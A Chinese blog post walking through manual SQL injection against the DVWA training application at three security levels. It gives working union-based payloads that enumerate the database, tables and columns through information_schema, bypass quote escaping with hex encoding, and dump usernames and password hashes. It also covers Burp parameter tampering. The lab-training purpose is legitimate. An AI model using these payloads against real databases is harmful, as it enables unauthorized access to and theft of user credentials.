DVWA SQL Injection

最新推荐文章于 2022-04-25 16:51:56 发布
最新推荐文章于 2022-04-25 16:51:56 发布
阅读量316 收藏 2
点赞数
分类专栏: DVWA 文章标签: 安全漏洞 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bohr777/article/details/108832614
版权

DVWA SQL Injection

MySql相关知识

MySQL5.0版本之后,MySQL默认在数据库中存放一个“information_cshema”的数据库,在该数据库中分别有三个表:SCHEMATA、TABLES、COLUMNS

  • SCHEMATA
    存储该用户创建的所有数据库的库名,其中SCHEMA_NAME字段存放数据库库名
  • TABLES
    TABLES表中存储用户创建的所有数据库的库名和表名,其中TABLE_SCHEMA字段存放数据库库名,TABLE_NAME字段存放数据库表名
  • COLUMNS
    COLUMNS表存储用户创建的所有数据库的库名、表名、字段名,其中TABLE_SCHEMA字段存放数据库库名,TABLE_NAME字段存放数据库表名,COLUMN_NAME字段存放数据库字段名

手工注入思路(非盲注)

1.判断是否存在注入点,注入是字符型注入还是数字型注入
2.判断SQL查询语句中的字段数
3.确定回显点
4.获取当前数据库
5.获取当前数据库中的表名
6.获取表中字段名
7.查询字段,获取表中数据

Low

1.判断是否存在注入点,注入是字符型注入还是数字型注入
输入1,页面正常

输入1' and '1'='1 页面正常,判断存在字符型注入
在这里插入图片描述
2.猜解SQL查询语句中的字段数
输入1' and 1 order by 1,2# 查询成功
在这里插入图片描述
输入1' and 1 order by 3# 查询失败,说明执行的SQL查询语句中只有两个字段
在这里插入图片描述

3.确定回显点
输入1' union select 1,2#
在这里插入图片描述
4.获取当前数据库
输入 1' union seecet 1,database()#,查得当前数据库为dvwa
在这里插入图片描述

5.获取数据库表名
输入1' union select 1,table_name from information_schema.tables where table_schema=database()#,查得当前数据库有两个表,guestbook和users
在这里插入图片描述

6.获取表中字段名
输入1' union select 1,column_name from information_schema.columns where table_name='users'#,查得users表中字段:user_id、first_name、last_name、user、password、avatar、last_login、failed_login
在这里插入图片描述

7.查询字段,获取表中数据
输入1' union select user,password from users#,查得user和password的数据
在这里插入图片描述

Medium

前端使用了下拉选择菜单,所以选择使用burp抓包,通过修改参数来提交恶意构造的查询语句
在这里插入图片描述
抓到数据包如下
在这里插入图片描述
将数据包发送到Repeater模块,通过修改参数id来提交构造的查询语句
1.判断是否存在注入点,注入是字符型注入还是数字型注入
修改参数id为1' and '1'='1 页面报错
在这里插入图片描述
修改参数id为1 and 1=1 查询成功,说明存在数字型注入
在这里插入图片描述
2.判断SQL查询语句中的字段数
修改参数id为1 order by 1,2查询成功
在这里插入图片描述
修改参数id为1 order by 1,2,3查询失败,说明执行的SQL查询语句中只有两个字段
在这里插入图片描述
3.确定回显点
修改参数id为1 union select 1,2
在这里插入图片描述
4.获取当前数据库
修改参数id为1 union select 1,database(),查得数据库名为dvwa
在这里插入图片描述
5.获取当前数据库中的表名
修改参数id为1 union select 1,table_name from information_schema.tables where table_schema=database(),查得数据库中有guestbook和users两个表
在这里插入图片描述
获取表中字段名
修改参数id为1 union select 1,column_name from information_schema.columns where table_name='users',查询失败,查看报错信息可知失败原因是'被转义为\'
在这里插入图片描述
可以使用十六进制绕过,修改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273,查询成功,查得字段名user_id、first_name、last_name、user、password、avatar、last_login、failed_login
在这里插入图片描述
这里为了方便在burp中观察使用了group_concat函数对字段名进行了拼接
7.查询字段,获取表中数据
修改参数id为1 union select user,password from users,查得user和password的数据
在这里插入图片描述

High

虽然High级别的查询提交页面与查询结果显示页面不是同一个,但手工注入过程和Low级别基本一致,这里便不再赘述,将直接演示最后一步查询字段,获取表中数据
输入1' and 1 union select user,password from users#,即可获取user和password的数据
在这里插入图片描述
这里查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,在使用sqlmap时应使用二阶注入选项--sceond-url

/周密/
关注
专栏目录
dvwa-SQL Injection
Alter__的博客
05-16 732
是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name,
DVWA SQL Injection (Blind)
部分学习记录
09-19 143
low 输入1,有结果,输入 1\,1’,没有报错信息,只返回无结果,试一下 1’ or 1=1,有结果,妥妥的字符型盲注 既然返回结果是true和false类型,那就直接构造判断语句进行猜解 字段数:1’ order by 2 #,正常 数据库长度:1’ and length(database())=4 # 拿到了数据库长度,接着猜解数据库,查了下可以利用ascii()和substr()进行猜解,ascii()可以将字符转换为对应ascii码值,substr()可以截取字符串,参数为字符串、起始位置、步
DVWASQL Injection
baynk的博客
10-29 1698
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA-SQL Injection
qq_45751902的博客
04-25 211
目录简介sql注入漏洞原理SQL注入漏洞类型危害安全级别:Low查看源码源码分析数据库名表名列名字段值安全级别:Medium查看源码源码分析数据库名表名列名字段值安全级别:High查看源码源码分析闭合符号为`’`判断列数数据库名表名列名数据安全级别:Impossible查看源码源码分析防护总结 简介 sql注入漏洞原理 将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的; SQL注入漏洞类型 字符型; 数字型; 搜索型; 危害 攻击者未经授权可以访问数据库中的数据,盗取用户的隐私
dvwaSQL Injection
qq_17762247的博客
06-05 254
一、简介 SQL Injection是一种常见的注入攻击类型,其攻击方式是在客户端的输入数据中插入SQL命令,然后发送到服务端,服务端对数据进行解析,并执行一些非预期的操作。成功的SQL注入攻击能够从数据库中读取敏感数据、篡改数据库数据、对数据库执行管理员操作,甚至执行系统命令,从而造成整个系统被攻击者控制。 二、Low 1、服务器端代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST
DVWA SQL Injection Medium
Ramona的博客
11-27 462
Mdeium 基本的步骤及知识点在上节已经提到过这里不再赘述:https://blog.csdn.net/WQ_BCJ/article/details/84554777 1)与low级别不同,本次采用的是下拉按钮的方式,限制了用户的输入,通过url可以发现并没有?id=.....类似的参数所以不是get方法,那么我们可以通过火狐的hackbar提交post数据试一试: 2)通过以上页...
dvwa sql injection
最新发布
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统...
sqlmap对dvwa SQL Injection进行带cookie注入
m0_63283172的博客
02-27 859
sqlmap对dvwa中输入点进行带cookie注入测试
DVWASQL Injection (Blind)
qq_39682037的博客
03-20 2208
盲注 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 Security Level: low 测试流程 输入 1 输入 1 and 1=1 输入1’ 输入 1’ and 1=1 输入 1’ and 1=2 输入1’ and length(database())=1 输入1’ and leng...
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA下的SQL注入
07-25
SQL
DVWASQL Injection
weixin_42075643的博客
02-19 355
SQL注入基础知识
dvwasql injection
Alsn86的博客
01-18 271
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输出来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
DVWA——SQL Injection
qq_41007744的博客
05-23 398
SQL InjectionLow&lt;?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE ...
DVWASQL Injection(含SQLMAP使用)
一期一会的博客
03-21 414
DVWASQL Injection 判断是否存在注入的方法:在输入框输入 1’ Select * from xxxx where id =1’ Select * from xxxx where id =’1’’ 无论是整型还是字符型此时都会报错,说明存在注入点 一.等级:LOW (一)分类 1.整型 测试如下: 此时界面结果显示一致,说明并非整型 select * from xxx where id=1 and 1=2 若为整型,说明sql语句不成立,会报错 2.字符型 在输入框输入“1’ an
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值